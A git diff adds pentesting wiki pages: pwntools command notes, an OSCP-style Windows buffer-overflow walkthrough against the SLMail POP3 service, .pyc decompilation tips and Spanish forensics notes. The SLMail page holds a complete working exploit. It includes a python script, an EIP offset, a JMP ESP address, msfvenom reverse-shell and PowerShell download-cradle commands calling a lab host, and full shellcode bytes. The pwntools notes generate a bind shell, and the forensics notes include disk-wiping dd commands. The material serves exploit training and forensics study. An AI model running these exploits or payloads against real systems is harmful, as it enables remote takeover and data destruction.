+Disas hex opcodes
+
+```text
+pwn disasm ffe4
+```
+
+**Can select:** 
+
+* context \(16,32,64,linux,windows...\) 
+* base addres 
+* color\(default\)/no color
+
+## Pwn elfdiff 
+
+Print differences between 2 fiels
+
+```text
+pwn elfdiff <file1> <file2>
+```
+
+## Pwn hex 
+
+Get hexadecimal representation
+
+```bash
+pwn hex hola #Get hex of "hola" ascii
+```
+
+## Pwn phd 
+
+Get hexdump 
+
+```text
+pwn phd <file>
+```
+
+ **Can select:** 
+
+* Number of bytes to show 
+* Number of bytes per line highlight byte 
+* Skip bytes at beginning
+
+## Pwn pwnstrip 
+
+## Pwn scrable
+
+## Pwn shellcraft 
+
+Get shellcodes
+
+```text
+pwn shellcraft -l #List shellcodes 
+pwn shellcraft -l amd #Shellcode with amd in the name
+pwn shellcraft -f hex amd64.linux.sh #Create in C and run
+pwn shellcraft -r amd64.linux.sh #Run to test. Get shell 
+pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
+```
+
+**Can select:**
+
+* shellcode and arguments for the shellcode
+* Out file
+* output format
+* debug \(attach dbg to shellcode\)
+* before \(debug trap before code\) 
+* after
+* avoid using opcodes \(default: not null and new line\)
+* Run the shellcode
+* Color/no color
+* list syscalls 
+* list possible shellcodes 
+* Generate ELF as a shared library
+
+## Pwn template 
+
+Get a python template 
+
+```text
+pwn template
+```
+
+**Can select:** host, port, user, pass, path and quiet
+
+## Pwn unhex 
+
+From hex to string 
+
+```text
+pwn unhex 686f6c61
+```
+
+## Pwn update 
+
+To update pwntools
+
+```text
+pwn update
+```
+
diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
new file mode 100644
index 00000000..825a1b11
--- /dev/null
+++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
@@ -0,0 +1,255 @@
+# Windows Exploiting \(Basic Guide - OSCP lvl\)
+
+## **Start installing the SLMail service**
+
+## Restart SLMail service
+
+Every time you need to **restart the service SLMail** you can do it using the windows console:
+
+```text
+net start slmail
+```
+
+![](../.gitbook/assets/image%20%28134%29.png)
+
+## Very basic python exploit template
+
+```text
+#!/usr/bin/python
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ip = '10.11.25.153'
+port = 110
+
+buffer = 'A' * 2700
+try:
+    print "\nLaunching exploit..."
+    s.connect((ip, port))
+    data = s.recv(1024)
+    s.send('USER username' +'\r\n')
+    data = s.recv(1024)
+    s.send('PASS ' + buffer + '\r\n')
+    print "\nFinished!."
+except:
+    print "Could not connect to "+ip+":"+port
+```
+
+## **Change Immunity Debugger Font**
+
+Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
+
+## **Attach the proces to Immunity Debugger:**
+
+**File --&gt; Attach**
+
+![](../.gitbook/assets/image%20%28111%29.png)
+
+**And press START button**
+
+## **Send the exploit and check if EIP is affected:**
+
+![](../.gitbook/assets/image%20%2822%29.png)
+
+Every time you break the service you should restart it as is indicated in the beginnig of this page.
+
+## Create a pattern to modify the EIP
+
+The pattern should be as big as the buffer you used to broke the service previously.
+
+![](../.gitbook/assets/image%20%28283%29.png)
+
+```text
+/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
+```
+
+Change the buffer of the exploit and set the pattern and lauch the exploit.
+
+A new crash should appeard, but with a different EIP address:
+
+![](../.gitbook/assets/image%20%2827%29.png)
+
+Check if the address was in your pattern:
+
+![](../.gitbook/assets/image%20%281%29.png)
+
+```text
+/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
+```
+
+Looks like **we can modify the EIP in offset 2606** of the buffer.
+
+Check it modifing the buffer of the exploit:
+
+```text
+buffer = 'A'*2606 + 'BBBB' + 'CCCC'
+```
+
+With this buffer the EIP crashed should point to 42424242 \("BBBB"\)
+
+![](../.gitbook/assets/image%20%28296%29.png)
+
+![](../.gitbook/assets/image%20%28336%29.png)
+
+Looks like it is working.
+
+## Check for Shellcode space inside the stack
+
+600B should be enough for any powerfull shellcode.
+
+Lets change the bufer:
+
+```text
+buffer = 'A'*2606 + 'BBBB' + 'C'*600
+```
+
+launch the new exploit and check the EBP and the length of the usefull shellcode
+
+![](../.gitbook/assets/image%20%28323%29.png)
+
+![](../.gitbook/assets/image%20%28299%29.png)
+
+You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
+
+In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
+
+## Check for bad chars
+
+Change again the buffer:
+
+```text
+badchars = (
+"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
+"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
+"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
+"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
+"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
+"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
+"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
+"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
+"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
+"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
+"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
+"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
+"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
+"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
+"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
+"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
+)
+buffer = 'A'*2606 + 'BBBB' + badchars
+```
+
+The badchars starts in 0x01 because 0x00 is almost always bad.
+
+Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:.
+
+For example:
+
+In this case you can see that **you shouldn't use the char 0x0A** \(nothing is saved in memory since the char 0x09\).
+
+![](../.gitbook/assets/image%20%28217%29.png)
+
+In this case you can see that **the char 0x0D is avoided**:
+
+![](../.gitbook/assets/image%20%2870%29.png)
+
+## Find a JMP ESP as a return address
+
+Using:
+
+```text
+!mona modules    #Get protections, look for all false except last one (Dll of SO)
+```
+
+You will **list the memory maps**. Search for some DLl that has:
+
+* **Rebase: False**
+* **SafeSEH: False**
+* **ASLR: False**
+* **NXCompat: False**
+* **OS Dll: True**
+
+![](../.gitbook/assets/image%20%28280%29.png)
+
+Now, inside this memory you should find some JMP ESP bytes, to do that execute:
+
+```text
+!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
+!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
+```
+
+**Then, if some address is found, choose one that don't contain any badchar:**
+
+![](../.gitbook/assets/image%20%28124%29.png)
+
+**In this case, for example:** _**0x5f4a358f**_
+
+## Create shellcode
+
+```text
+msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
+msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
+```
+
+If the exploit is not working but it should \(you can see with ImDebg that the shellcode is reached\), try to create other shellcodes \(msfvenom with create different shellcodes for the same parameters\).
+
+Add some NOPS at the beginning of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
+
+```text
+#!/usr/bin/python
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ip = '10.11.25.153'
+port = 110
+
+shellcode = (
+"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
+"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
+"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
+"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
+"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
+"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
+"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
+"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
+"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
+"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
+"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
+"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
+"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
+"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
+"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
+"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
+"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
+"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
+"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
+"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
+"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
+"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
+"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
+"\x2d\xb8\x63\xe2\x4e\xe9"
+)
+
+buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
+try:
+    print "\nLaunching exploit..."
+    s.connect((ip, port))
+    data = s.recv(1024)
+    s.send('USER username' +'\r\n')
+    data = s.recv(1024)
+    s.send('PASS ' + buffer + '\r\n')
+    print "\nFinished!."
+except:
+    print "Could not connect to "+ip+":"+port
+```
+
+## Improving the shellcode
+
+Add this parameters:
+
+```text
+EXITFUNC=thread -e x86/shikata_ga_nai
+```
+
diff --git a/forensics/basic-forensics-esp/.pyc.md b/forensics/basic-forensics-esp/.pyc.md
new file mode 100644
index 00000000..d5374f7e
--- /dev/null
+++ b/forensics/basic-forensics-esp/.pyc.md
@@ -0,0 +1,63 @@
+# .pyc
+
+## Getting the code
+
+For the .pyc binaries \("compiled" python\) you should start trying to **extract** the **original** **python** **code**:
+
+```text
+uncompyle6 binary.pyc  > decompiled.py
+```
+
+**Be sure** that the binary has the **extension** "**.pyc**" \(if not, uncompyle6 is not going to work\)
+
+After extracting it, it will be more easy to analyze.
+
+## Analyzing python assembly
+
+If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** \(but i**t isn't very descriptive**, so **try** to extract **again** the original code\).
+
+In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **dissasemble** the _.pyc_ binary \(good luck understanding the code flow\). If the _.pyc_ is from python2, use python2:
+
+```text
+>>> import dis
+>>> import marshal
+>>> import struct
+>>> import imp
+>>>
+>>> with open('hello.pyc', 'r') as f:  # Read the binary file
+...     magic = f.read(4)
+...     timestamp = f.read(4)
+...     code = f.read()
+...
+>>>
+>>> # Unpack the structure content and un-marshal the code
+>>> magic = struct.unpack('<H', magic[:2])
+>>> timestamp = struct.unpack('<I', timestamp)
+>>> code = marshal.loads(code)
+>>> magic, timestamp, code
+((62211,), (1425911959,), <code object <module> at 0x7fd54f90d5b0, file "hello.py", line 1>)
+>>>
+>>> # Verify if magic number corresponds with the current python version
+>>> struct.unpack('<H', imp.get_magic()[:2]) == magic
+True
+>>>
+>>> # Disassemble the code object
+>>> dis.disassemble(code)
+  1           0 LOAD_CONST               0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
+              3 MAKE_FUNCTION            0
+              6 STORE_NAME               0 (hello_world)
+              9 LOAD_CONST               1 (None)
+             12 RETURN_VALUE
+>>>
+>>> # Also disassemble that const being loaded (our function)
+>>> dis.disassemble(code.co_consts[0])
+  2           0 LOAD_CONST               1 ('Hello  {0}')
+              3 LOAD_ATTR                0 (format)
+              6 LOAD_FAST                0 (name)
+              9 CALL_FUNCTION            1
+             12 PRINT_ITEM
+             13 PRINT_NEWLINE
+             14 LOAD_CONST               0 (None)
+             17 RETURN_VALUE
+```
+
diff --git a/forensics/basic-forensics-esp/README.md b/forensics/basic-forensics-esp/README.md
new file mode 100644
index 00000000..8a7541de
--- /dev/null
+++ b/forensics/basic-forensics-esp/README.md
@@ -0,0 +1,514 @@
+# Basic Forensics \(ESP\)
+
+*  **Collect**
+* **Preserve**
+* **Analyze**
+* **Present**
+
+Cuando hagas reboot a una máquina afectada hay que iniciarla desde nuestro propio USB booteado. Pues usar el SO de la maquina modificara metadata de algunos archivos \(como access time\) y las herramientas de dicha máquina no son confiables.
+
+**Linux/Unix**
+
+En linux cualquier cosa es un archivo. Por ejemplo la RAM es un archivo llamado **/dev/mem**
+
+**lsof** —&gt; Open files belonging to any process  
+**lsof -i** 4 —&gt; Todos los archivos relacionados con conexiones IPv4  
+**lsof -i 4 -a -p 1234** —&gt; List all open IPV4 network files in use by the preocess 1234  
+**lsof /dev/hda3** lista todos los archivos abiertos en /dev/hda3  
+**lsof -t /u/ade/foo** encuentra el proceso que tiene /u/abe/foo abierto  
+**lsof +D /directory/path** Busca que procesos tienen abiertos dicho directorio y archivos de dicho directorio  
+**lsof -i :1-1024** Archivos que usan dichos puertos  
+**lsof -i udp** Archivos que usan UDP -uid 0  
+**lsof -p 3 - R** Muestra del proceso nº3 también su proceso padre  
+**date** —&gt; Hora del ordenador actual  
+**uptime** —&gt; Rebooted  
+**uname -a** —&gt; System information  
+**ifconfig** —&gt; Ver si esta en modo promiscuo  
+**ps -eaf** —&gt; Procesos y servicios inusuales  
+**netstat -punta**  
+**lsof +L1** —&gt; Muestra todos los archivos abiertos con un contador de link menor de 1. Esto es para los procesos que eliminan el archivo del que vienen pero siguen ejecutandose porque ya están en memoria. Es decir lista todos los procesos que tienen su archivo borrado.  
+**w who users** —&gt; Info de usuarios  
+**find / -uid 0 -perm -4000 2&gt;/dev/null** —&gt; Sirve para encontrar todos los archivos que tienen de permiso la **s**  
+**find /directory -type f -mtime -1 -print** —&gt; Encuentra todos los archivos dentro de ese directorio modificados hace menos de 1 día  
+**last** —&gt; Último usuario loggeado  
+**df** —&gt; Free space  
+**free** —&gt; free y used physical y swap memory
+
+Toda la info obtenida de la máquina infectada NO debe ser guardada en la máquina sino enviada a otra con **netcat**
+
+### **MemoryDump**
+
+####  **memdmp**
+
+ **Linux Memory Extractor \(LiME\)** —&gt; Kernel module —&gt; Descargar de git y hacer make —&gt; **insmod ./lime-3.13.0-44-generic.ko "path=/home/sansforensics/Desktop/mem\_dump.bin format=padded"** —&gt; Inserta el modulo en el kernel el cual puede ser visto con **lsmod** —&gt; **rmmod lime** —&gt; Para eliminarlo  
+**strings -n 8 mem\_dump.bin** —&gt; Da todas las strings de tamaño igual o superior a 8  
+**Fmem** —&gt; Kernel Module  
+live response from **E-FENSE** —&gt; Insertar un USB y vas seleccionando los datos que quieres  
+**F-Response** —&gt; Remotely
+
+### **Copy Hard Drive**
+
+**DD —&gt;** Coge bloques de memoria, les aplica el cambio que necesita y los coloca en su sitio. Por defecto bloques de 512B
+
+**dd if=INPUT\_FILE of=OUTPUT\_FILE bs=Nk \(N es el numero de Kilobytes\)** —&gt; Un bs mayor de 8KB puede hacer que vaya más lento  
+**count=s** —&gt; s es el numero de bloques a copiar  
+**skip=n** —&gt; n es el numero de bloques de los que pasar  
+**seek=n** —&gt; n es el número de de bloques del outputfile
+
+Un problema con DD es que no da feedback y si encuentra un error se queda parado sin que tu lo sepas \(una seccion no puede leerla y se para\) para eso se puede usar:
+
+**conv=noerror,sync** —&gt; Pasa de los errores y sigue y rellena con 0s lo que no pudo copiar  
+**dd if=/dev/zero of=/dev/hdb** —&gt; Lo pone a cero \(3-7 veces para dejarlo limpio\)  
+**dd if=/dev/zero of/path/file count=1** —&gt; Si no ponemos un count nunca parará de copiar 0s  
+**dd if=/dev/hdb of=/dev/hda** —&gt; Hay que tener cuidado pues lo que sobre del disco serán 0s y esto hará que el hash sea distinto. Hay que averiguar el número de bloques para calcular el hash solo de ese número de bloques  
+**dd if=/dev/hda of=/cas1/evidence.dd**  
+**ssh** [**pi@10.10.10.48**](mailto:pi@10.10.10.48) **“sudo dcfldd if=/dev/sbd \| gzip -1 -” \| dcfldd of=pi.dd.gz**  
+**Forensic listen: nc -l -p 8888 &gt; /dev/hdg**  
+**Infected device: dd if/dev/hda \| nc IPADDR 8888 -w 3** —&gt; La opción w le dice que si no se envía nada en 3 segundo, se desconecta  
+DD no checkea hashes, hay que hacerlo de forma manual  
+**sdd** —&gt; DD para forensia, da más datos y puede ser un poco más rápido
+
+[http://malwarefieldguide.com/LinuxChapter1.html](http://malwarefieldguide.com/LinuxChapter1.html)
+
+### **BOOT LINUX**
+
+La MBR \(master boot record\) está en el sector 0, se crea al particionar el disco y es siempre de 512B. 446B son el boot code, 64B de la tabla de partición y 2B son de la firma \(55AA\).
+
+La firma del offset 01B8 identifica el disco al SO.
+
+La tabla de partición contiene las 4 primeras particiones en 16B cada especificando el inicio y el fin. También indica si la partición es la que hay que bootear y el tamaño.
+
+Cuando identifica la active partition carga un copia del boot sector de la active partition en memoria y pasa el control al código ejecutable.
+
+EFI usa GUID \(globally unique identification\) compuesto por GPT\(puede tener hasta 128 primary partitions\) y jumps.
+
+Linux usa EXT file system \(basado en el de UNIX\) . Un sistema con este particionado tiene un optional boot block y un superblock. El superblock define las estructuras de datos y los limites del sistema de ficheros. Contiene información de:
+
+ Magic number
+
+ Mount count and maximum mount count
+
+ block size \(4096B\) —&gt; Un bloque es la unidad mínima para guardar info
+
+ INODE count y block count![](https://feelsec.info/wp-content/uploads/2019/01/Pasted-Graphic.jpg)
+
+ number of free disk blocks
+
+ number of free INODEs on the system
+
+ first INODE —&gt; INODE number del first INODE en l file system \(en un EXT2,3,4 sería / del directorio\)
+
+Un INODE contiene metadata de un archivo \(uno o varios files tienen por lo menos un INODE\): tipo, dueño, permiso, tiempos \(ultima modif, aceso..\), links al file y data block addresses.
+
+Cómo encuentra /etc/myconfig
+
+Primero va al INODE de / del cual saca la info de que es un directorio y dónde tiene el contenido. El contenido es una lista de archivos y subdirs que están en /. El subdirectorio etc debe de estar en esta lista con su INODE. Por lo tanto se mira su INODE, se averigua que es un directorio y se va donde tenga el contenido. En este contenido se busca myconfig junto con su número de INODE. Del INODE sacamos que myconfig es un archivo y su contenido son los block addresses donde lo guarda.
+
+Pasted Graphic.tiff ¬
+
+Cada archivo tiene su contenido almacenado en bloques, metadata en el INODE y el nombre e INODE number en el directorio dentro del que está. Cada vez que se crea, el numero de INODES decrementa en 1.
+
+Cuando se elimina un archivo y el numero de Link-Count del INODE llega a 0 en EXT2:
+
+ los data blocks del block bitmap son marcados como libres
+
+ el INODE en el INODE bitmap se marca como libre
+
+ el deletion Time se pone en el INODE
+
+ el directory entry se marca como unused
+
+ Las conexiones entre la entrada del directorio, INODE, y los data blocks seguirán ahí hasta que se sobreescriban.
+
+Como la informacion del directory entry aún está disponible, puedes encontrar la relacion entre el file name y su INODE.
+
+Cambios en EXT3 y 4:
+
+ EL file size en el INODE se pone a 0
+
+ Los datos sobre los bloques son limpiados, por lo que no hay LINK entre INODE y los data blocks. Aun así, hay algunas formas de recuperar la info.
+
+Los comandos **SRM** o **shred** borran intencionadamente el contenido.
+
+Un Hard link tendrá el mismo INODE que el orginial por lo tanto comparten metadata y apuntan a los mismos bloques. Es decir un archivo con otro nombre que apunta a lo mismo.
+
+Un Soft link tendrá distinto INODE y solo guardará la información de a qué archivo apunta.
+
+|  **Directory** |  **Content** |
+| :--- | :--- |
+|  /bin |  Common programs, shared by the system, the system administrator and the users. |
+|  /boot |  The startup files and the kernel, vmlinuz. In some recent distributions also grub data. Grub is the GRand Unified Boot loader and is an attempt to get rid of the many different boot-loaders we know today. |
+|  /dev |  Contains references to all the CPU peripheral hardware, which are represented as files with special properties. |
+|  /etc |  Most important system configuration files are in /etc, this directory contains data similar to those in the Control Panel in Windows |
+|  /home |  Home directories of the common users. |
+|  /initrd |  \(on some distributions\) Information for booting. Do not remove! |
+|  /lib |  Library files, includes files for all kinds of programs needed by the system and the users. |
+|  /lost+found |  Every partition has a lost+found in its upper directory. Files that were saved during failures are here. |
+|  /misc |  For miscellaneous purposes. |
+|  /mnt |  Standard mount point for external file systems, e.g. a CD-ROM or a digital camera. |
+|  /net |  Standard mount point for entire remote file systems |
+|  /opt |  Typically contains extra and third party software. |
+|  /proc |  A virtual file system containing information about system resources. More information about the meaning of the files in proc is obtained by entering the command **man** _**proc**_ in a terminal window. The file proc.txt discusses the virtual file system in detail. |
+|  /root |  The administrative user's home directory. Mind the difference between /, the root directory and /root, the home directory of the _root_ user. |
+|  /sbin |  Programs for use by the system and the system administrator. |
+|  /tmp |  Temporary space for use by the system, cleaned upon reboot, so don't use this for saving any work! |
+|  /usr |  Programs, libraries, documentation etc. for all user-related programs. |
+|  /var |  Storage for all variable files and temporary files created by users, such as log files, the mail queue, the print spooler area, space for temporary storage of files downloaded from the Internet, or to keep an image of a CD before burning it. |
+
+**Sleuthkit y Autopsy**
+
+Lo primero que tenemos que hacer es encontrar el inicio de la partición. Para eso podemos usar **fdisk** o **mmls**. **mmls PATH\_IMAGEN** \(mmls da la info en base a bloques de 512B y fdisk da la info en base a cilindros, se suele usar mmls porque te interesan los Bytes para sleuthkit\)
+
+De esta forma encontramos el offset en la que comienza el SO. Conociendo en offset con el que empieza podemos empezar a usar Sleuthkit.
+
+Con **fsstat** podemos encontrar el tipo de partición que es. **fsstat -o OFFSET IMAGEN**
+
+**fls -o OFFSET -f FS\_TYPE -m “/“ -r PATH\_IMAGEN &gt; flsBody** —&gt; Da todos los archivos encontrados que aun tienen el nombre puesto desde / en formato MACTIME
+
+**ils -o OFFSET -f FS\_TYPE -m PATH\_IMAGEM &gt; ilsBody** —&gt; Da todos los INODES que encuentra en formato MACTIME
+
+Autopsy es la GUI de Sleuth Kit.
+
+Los SDD complican el rescatar información.
+
+File system layer tools start with **FS**
+
+File name layer tools starts with **F**
+
+Metadata layer tools strat with **I**
+
+Data layer tools start with **BLK**
+
+Todos los comandos necesitan por lo menos el nombre de la imagen:
+
+ **-f &lt;fs\_type&gt;** —&gt; EXT2,3 FAT12,16,32…
+
+ **-o imgoffset** —&gt; Sector offset where the file system starts in the image
+
+ **BLK —&gt;Block**
+
+ **blkstat** —&gt; Muestra información del bloque \(como si está allocated\)
+
+ **blkstat -f ext2 myImage.img 300** —&gt; Muestra info del bloque 300
+
+ **blkls** —&gt; Muestra toda la Unallocated Data \(útil para recuperar info\)
+
+ **-e** —&gt; Lista todos los datos
+
+ **-s** —&gt; liste the slack \(ntfs o fat\)
+
+ **blkcat** —&gt; Muestra el contenido de un bloque
+
+ **-h** -&gt; Para mostrarlo en hexadecimal
+
+ **blkcat -f ext2 myImage.img 200** —&gt; Muestra lo que hay en el bloque 200
+
+ I **—&gt; INODE\(Meta data\)**
+
+ **istat** —&gt; Info de un INODE: INODE number, mac time, permission, file size, allocation status o allocated data blocks number, number of links…
+
+ **istat -f ext2 myImage.img INODENUMBER**
+
+ **ifind** —&gt; De un block number a un INODE number. Si encuentras un bloque interesante así puedes encontrar los demás.
+
+ **ifind -f ext2 -d DATABLOCKNUMBER myImage.img**
+
+ **ils** —&gt; List all inodes and info. Included deleted files and unlinked but opened files
+
+ Por defecto solo muestra los de archivos borrados
+
+ **-e** —&gt; Muestra todos
+
+ **-m** —&gt; crea un archivo para MACTIME —&gt; Organiza el resultado y presenta un timeline de actividades. Pone un 127 al INODE si ela rchivo ha sido borrado.
+
+ **-o** —&gt; Open but no filename
+
+ **-z** —&gt; INODE with zero status time change \(never used\)
+
+ **icat** —&gt; Dada la imagen sospechosa y el INODE, saca el contenido, puede recuperar archivos perdidos. Debemos encontrar el INODE number con ils.
+
+ **icat -f ext2 /image 20**
+
+ **F —&gt; File name**
+
+ **fls** —&gt; Lista los nombres y subdirs de un directorio. Por defecto los del root. Deleted files have a \* before them. Si el nombre fue sobreescrito, no lo encontrará, pero ILS sí.
+
+ **-a** —&gt; Display all
+
+ **-d** —&gt; Deleted only
+
+ **-u** —&gt; undeleted
+
+ **-D** —&gt; Directories
+
+ **-F** —&gt; File entries only
+
+ **-r** —&gt; Recursive on subdirs
+
+ **-p** —&gt; Full path
+
+ **-m output** —&gt; TIMELINE format
+
+ **-l** —&gt; Long version information
+
+ **-s** —&gt; Skew in seconds combined with -l and/or -m
+
+ **fls -r image 12**
+
+ **fls -f ext3 -m “/” -r imaes/root.dd**
+
+ **fls -o 2048 -f ext2 -m "/" -r '/home/sansforensics/Desktop/LinuxFinancialCase.001' &gt; flsBody**
+
+ **ffind** —&gt; Filename de un INODE. Busca por todas partes hasta encontrar a qué filename apunta el INODE
+
+ **-a** —&gt; Coge todos los nombres que apuntan al INODE
+
+ **ffind -f ext2 myImage.img INODENUMBER**
+
+**Mount -o ro,loop /my\_hda1.dd /mnt/hacked** —&gt; Siempre se debe montar con ro \(read only\), loop es por si lo que montas no es un disco sino un archivo \(una imagen por ejemplo\)
+
+**MACTIME:**
+
+ **M** —&gt; Last time files data block changed \(Modification\)
+
+ **A** —&gt; Last time files data block accessed \(Access\)
+
+ **C** —&gt; Last time inodes content changed \(in windows, this is creation time\) \(Change time\)
+
+**mactime -b FLSbodymac -d &gt; MACtimeFLS.csv**
+
+En linux usar **touch** modifica los 2 primeros. En windows hay un programa que modifica los 3 \(todo se modifica muy facilmente\).
+
+**touch -a -d ‘2017-01-03 08:46:23’ FILE** —&gt; Modifica el access según la hora dada
+
+Comando **stat** da los tres valores MAC del archivo.
+
+Conseguir el archivo en formato MACTIME
+
+ **fls -f ext3 -m “/“ -r images/root.dd &gt; data/body**
+
+ **ils -f openbsd -m images/root.dd &gt; data/body**
+
+Binary files modified in 1 day: **find /directory\_path -type f -a=x -mtime -1 -print**
+
+Files created in 1 day: **find /directory\_path -type f -a=x -bmin -24 -print**
+
+Se pueden guardar todo el raw data unallocated de la imagen usando dls myImage &gt; unallocated \(el contenido de estos datos puede ser cualquier cosa: .jpeg, .pdf …\)
+
+Se puede saber qué datos son usando programas de data carving \(se basan en headers, footers para saber que tipo de archivo es, dónde empieza y dónde acaba\).
+
+Data carving tools: **Foremost, Scalpel, Magic Rescue, Photorec, TestDisk, etc**
+
+**Foremost**
+
+Para user Foremost tenemos que ir a su archivo de configuración \(find / -name foremost.comf\) y descomentar las líneas de los tipos de archivo que nos interesen.
+
+**foremost -c fremost.conf -T -i FILE** \(La T es para que vaya asginando nombres unicos\)
+
+**BOOTABLES**
+
+CAINE
+
+HELIXS/HELIX3 PRO
+
+KALI
+
+PENGUIN SLEUTH
+
+F.I.R.E
+
+SNARL
+
+**BUILT-IN FUNCTIONALITIES**
+
+Deleted file recovery
+
+Keyword search
+
+Hash Analysis
+
+Data carving
+
+Graphic view
+
+Email view
+
+**Analysis procedure**
+
+Create a case
+
+Add evidence to a case
+
+Perform throrough analysis
+
+Obtain basic analysis data
+
+Export files
+
+Generate report
+
+**WINDOWS**
+
+**Volatile Information**
+
+System Information
+
+ Processes information
+
+ Network information
+
+ Logged on users
+
+ Clipboard contents
+
+ Command history - doskey/history
+
+ MACTime
+
+Comandos para obtener esta info:
+
+ date /T; time /T
+
+ uptime
+
+ ipconfig
+
+ tasklist /svc
+
+ openfiles
+
+ netstat
+
+**Helix:**
+
+Primer apartado: Info del sistema
+
+ Procesos corriendo
+
+ Segundo apartado: Permite crear copias del disco y memoria, primero usando **dd** \(mejor usar os otros\)
+
+ En la segunda página usando **FTK imager**
+
+ Es la tercera página, RAM usando **Winen** o **MDD**
+
+ Tercer apartado: Incident response
+
+ Cuarto apartado: Navegación por el disco, no usar mucho porque cambian los tiempos de acceso
+
+ Quinto apartado: Saca todas las imagenes
+
+**Volatility:**
+
+ vol.py -f PATH\_IMAGE imageinfo —&gt; Primer plug-in a usar para obtener el so
+
